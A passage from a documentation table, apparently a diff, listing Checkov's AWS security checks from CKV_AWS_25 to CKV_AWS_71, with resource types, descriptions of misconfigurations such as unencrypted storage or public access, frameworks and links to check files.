AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Cloudformation | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | +| 211 | CKV_AWS_25 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | +| 212 | CKV_AWS_25 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | +| 213 | CKV_AWS_25 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | +| 214 | CKV_AWS_26 | resource | AWS::SNS::Topic | Ensure all data stored in the SNS topic is encrypted | Cloudformation | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SNSTopicEncryption.py) | +| 215 | CKV_AWS_26 | resource | aws_sns_topic | Ensure all data stored in the SNS topic is encrypted | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py) | +| 216 | CKV_AWS_27 | resource | AWS::SQS::Queue | Ensure all data stored in the SQS queue is encrypted | Cloudformation | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SQSQueueEncryption.py) | +| 217 | CKV_AWS_27 | resource | aws_sqs_queue | Ensure all data stored in the SQS queue is encrypted | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py) | +| 218 | CKV_AWS_28 | resource | AWS::DynamoDB::Table | Ensure DynamoDB point in time recovery (backup) is enabled | Cloudformation | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbRecovery.py) | +| 219 | CKV_AWS_28 | resource | aws_dynamodb_table | Ensure DynamoDB point in time recovery (backup) is enabled | Terraform | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py) | +| 220 | CKV_AWS_29 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Cloudformation | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) | +| 221 | CKV_AWS_29 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) | +| 222 | CKV_AWS_30 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Cloudformation | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) | +| 223 | CKV_AWS_30 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) | +| 224 | CKV_AWS_31 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Cloudformation | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) | +| 225 | CKV_AWS_31 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Terraform | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) | +| 226 | CKV_AWS_32 | resource | AWS::ECR::Repository | Ensure ECR policy is not set to public | Cloudformation | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRPolicy.py) | +| 227 | CKV_AWS_32 | resource | aws_ecr_repository_policy | Ensure ECR policy is not set to public | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py) | +| 228 | CKV_AWS_33 | resource | AWS::KMS::Key | Ensure KMS key policy does not contain wildcard (*) principal | Cloudformation | [KMSKeyWildCardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSKeyWildCardPrincipal.py) | +| 229 | CKV_AWS_33 | resource | aws_kms_key | Ensure KMS key policy does not contain wildcard (*) principal | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py) | +| 230 | CKV_AWS_34 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution ViewerProtocolPolicy is set to HTTPS | Cloudformation | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionEncryption.py) | +| 231 | CKV_AWS_34 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py) | +| 232 | CKV_AWS_35 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | Cloudformation | [CloudtrailEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailEncryption.py) | +| 233 | CKV_AWS_35 | resource | aws_cloudtrail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py) | +| 234 | CKV_AWS_36 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail log file validation is enabled | Cloudformation | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailLogValidation.py) | +| 235 | CKV_AWS_36 | resource | aws_cloudtrail | Ensure CloudTrail log file validation is enabled | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py) | +| 236 | CKV_AWS_37 | resource | aws_eks_cluster | Ensure Amazon EKS control plane logging is enabled for all log types | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py) | +| 237 | CKV_AWS_38 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0 | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py) | +| 238 | CKV_AWS_39 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint disabled | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py) | +| 239 | CKV_AWS_40 | resource | AWS::IAM::Policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Cloudformation | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | +| 240 | CKV_AWS_40 | resource | aws_iam_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | +| 241 | CKV_AWS_40 | resource | aws_iam_user_policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | +| 242 | CKV_AWS_40 | resource | aws_iam_user_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | +| 243 | CKV_AWS_41 | provider | aws | Ensure no hard coded AWS access key and secret key exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py) | +| 244 | CKV_AWS_41 | resource | serverless_aws | Ensure no hard coded AWS access key and secret key exists in provider | serverless | [AWSCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AWSCredentials.py) | +| 245 | CKV_AWS_42 | resource | AWS::EFS::FileSystem | Ensure EFS is securely encrypted | Cloudformation | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EFSEncryptionEnabled.py) | +| 246 | CKV_AWS_42 | resource | aws_efs_file_system | Ensure EFS is securely encrypted | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py) | +| 247 | CKV_AWS_43 | resource | AWS::Kinesis::Stream | Ensure Kinesis Stream is securely encrypted | Cloudformation | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KinesisStreamEncryptionType.py) | +| 248 | CKV_AWS_43 | resource | aws_kinesis_stream | Ensure Kinesis Stream is securely encrypted | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py) | +| 249 | CKV_AWS_44 | resource | AWS::Neptune::DBCluster | Ensure Neptune storage is securely encrypted | Cloudformation | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterStorageEncrypted.py) | +| 250 | CKV_AWS_44 | resource | aws_neptune_cluster | Ensure Neptune storage is securely encrypted | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py) | +| 251 | CKV_AWS_45 | resource | AWS::Lambda::Function | Ensure no hard-coded secrets exist in Lambda environment | Cloudformation | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py) | +| 252 | CKV_AWS_45 | resource | AWS::Serverless::Function | Ensure no hard-coded secrets exist in Lambda environment | Cloudformation | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py) | +| 253 | CKV_AWS_45 | resource | aws_lambda_function | Ensure no hard-coded secrets exist in lambda environment | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py) | +| 254 | CKV_AWS_46 | resource | AWS::EC2::Instance | Ensure no hard-coded secrets exist in EC2 user data | Cloudformation | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2Credentials.py) | +| 255 | CKV_AWS_46 | resource | aws_instance | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | +| 256 | CKV_AWS_46 | resource | aws_launch_configuration | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | +| 257 | CKV_AWS_46 | resource | aws_launch_template | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | +| 258 | CKV_AWS_47 | resource | AWS::DAX::Cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Cloudformation | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DAXEncryption.py) | +| 259 | CKV_AWS_47 | resource | aws_dax_cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Terraform | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py) | +| 260 | CKV_AWS_48 | resource | aws_mq_broker | Ensure MQ Broker logging is enabled | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py) | +| 261 | CKV_AWS_49 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py) | +| 262 | CKV_AWS_49 | resource | serverless_aws | Ensure no IAM policies documents allow "*" as a statement's actions | serverless | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/StarActionPolicyDocument.py) | +| 263 | CKV_AWS_50 | resource | aws_lambda_function | X-Ray tracing is enabled for Lambda | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py) | +| 264 | CKV_AWS_51 | resource | AWS::ECR::Repository | Ensure ECR Image Tags are immutable | Cloudformation | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImmutableTags.py) | +| 265 | CKV_AWS_51 | resource | aws_ecr_repository | Ensure ECR Image Tags are immutable | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py) | +| 266 | CKV_AWS_53 | resource | AWS::S3::Bucket | Ensure S3 bucket has block public ACLs enabled | Cloudformation | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicACLs.py) | +| 267 | CKV_AWS_53 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public ACLS enabled | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py) | +| 268 | CKV_AWS_54 | resource | AWS::S3::Bucket | Ensure S3 bucket has block public policy enabled | Cloudformation | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicPolicy.py) | +| 269 | CKV_AWS_54 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public policy enabled | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py) | +| 270 | CKV_AWS_55 | resource | AWS::S3::Bucket | Ensure S3 bucket has ignore public ACLs enabled | Cloudformation | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3IgnorePublicACLs.py) | +| 271 | CKV_AWS_55 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has ignore public ACLs enabled | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py) | +| 272 | CKV_AWS_56 | resource | AWS::S3::Bucket | Ensure S3 bucket has RestrictPublicBuckets enabled | Cloudformation | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3RestrictPublicBuckets.py) | +| 273 | CKV_AWS_56 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has 'restrict_public_buckets' enabled | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py) | +| 274 | CKV_AWS_57 | resource | AWS::S3::Bucket | Ensure the S3 bucket does not allow WRITE permissions to everyone | Cloudformation | [S3PublicACLWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLWrite.py) | +| 275 | CKV_AWS_57 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | +| 276 | CKV_AWS_57 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | +| 277 | CKV_AWS_58 | resource | AWS::EKS::Cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Cloudformation | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSSecretsEncryption.py) | +| 278 | CKV_AWS_58 | resource | aws_eks_cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py) | +| 279 | CKV_AWS_59 | resource | AWS::ApiGateway::Method | Ensure there is no open access to back-end resources through API | Cloudformation | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAuthorization.py) | +| 280 | CKV_AWS_59 | resource | aws_api_gateway_method | Ensure there is no open access to back-end resources through API | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py) | +| 281 | CKV_AWS_60 | resource | AWS::IAM::Role | Ensure IAM role allows only specific services or principals to assume it | Cloudformation | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowsPublicAssume.py) | +| 282 | CKV_AWS_60 | resource | aws_iam_role | Ensure IAM role allows only specific services or principals to assume it | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py) | +| 283 | CKV_AWS_61 | resource | AWS::IAM::Role | Ensure AWS IAM policy does not allow assume role permission across all services | Cloudformation | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) | +| 284 | CKV_AWS_61 | resource | aws_iam_role | Ensure AWS IAM policy does not allow assume role permission across all services | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) | +| 285 | CKV_AWS_62 | resource | AWS::IAM::Group | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 286 | CKV_AWS_62 | resource | AWS::IAM::Policy | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 287 | CKV_AWS_62 | resource | AWS::IAM::Role | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 288 | CKV_AWS_62 | resource | AWS::IAM::User | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 289 | CKV_AWS_62 | resource | aws_iam_group_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 290 | CKV_AWS_62 | resource | aws_iam_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 291 | CKV_AWS_62 | resource | aws_iam_role_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 292 | CKV_AWS_62 | resource | aws_iam_user_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 293 | CKV_AWS_62 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 294 | CKV_AWS_63 | resource | AWS::IAM::Group | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 295 | CKV_AWS_63 | resource | AWS::IAM::Policy | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 296 | CKV_AWS_63 | resource | AWS::IAM::Role | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 297 | CKV_AWS_63 | resource | AWS::IAM::User | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 298 | CKV_AWS_63 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 299 | CKV_AWS_63 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 300 | CKV_AWS_63 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 301 | CKV_AWS_63 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 302 | CKV_AWS_63 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 303 | CKV_AWS_64 | resource | AWS::Redshift::Cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Cloudformation | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterEncryption.py) | +| 304 | CKV_AWS_64 | resource | aws_redshift_cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py) | +| 305 | CKV_AWS_65 | resource | AWS::ECS::Cluster | Ensure container insights are enabled on ECS cluster | Cloudformation | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSClusterContainerInsights.py) | +| 306 | CKV_AWS_65 | resource | aws_ecs_cluster | Ensure container insights are enabled on ECS cluster | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py) | +| 307 | CKV_AWS_66 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group specifies retention days | Cloudformation | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupRetention.py) | +| 308 | CKV_AWS_66 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group specifies retention days | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py) | +| 309 | CKV_AWS_67 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail is enabled in all Regions | Cloudformation | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailMultiRegion.py) | +| 310 | CKV_AWS_67 | resource | aws_cloudtrail | Ensure CloudTrail is enabled in all Regions | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py) | +| 311 | CKV_AWS_68 | resource | AWS::CloudFront::Distribution | CloudFront Distribution should have WAF enabled | Cloudformation | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFEnabled.py) | +| 312 | CKV_AWS_68 | resource | aws_cloudfront_distribution | CloudFront Distribution should have WAF enabled | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py) | +| 313 | CKV_AWS_69 | resource | AWS::AmazonMQ::Broker | Ensure Amazon MQ Broker should not have public access | Cloudformation | [AmazonMQBrokerPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AmazonMQBrokerPublicAccess.py) | +| 314 | CKV_AWS_69 | resource | aws_mq_broker | Ensure MQ Broker is not publicly exposed | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py) | +| 315 | CKV_AWS_70 | resource | aws_s3_bucket | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | +| 316 | CKV_AWS_70 | resource | aws_s3_bucket_policy | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | +| 317 | CKV_AWS_71 | resource | AWS::Redshift::Cluster | Ensure Redshift Cluster logging is enabled | Cloudformation | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterLogging.py) | +| 318 | CKV_AWS_71 | resource | aws_redshift_cluster | Ensure Redshift Cluster logging is enabled | Terraform | 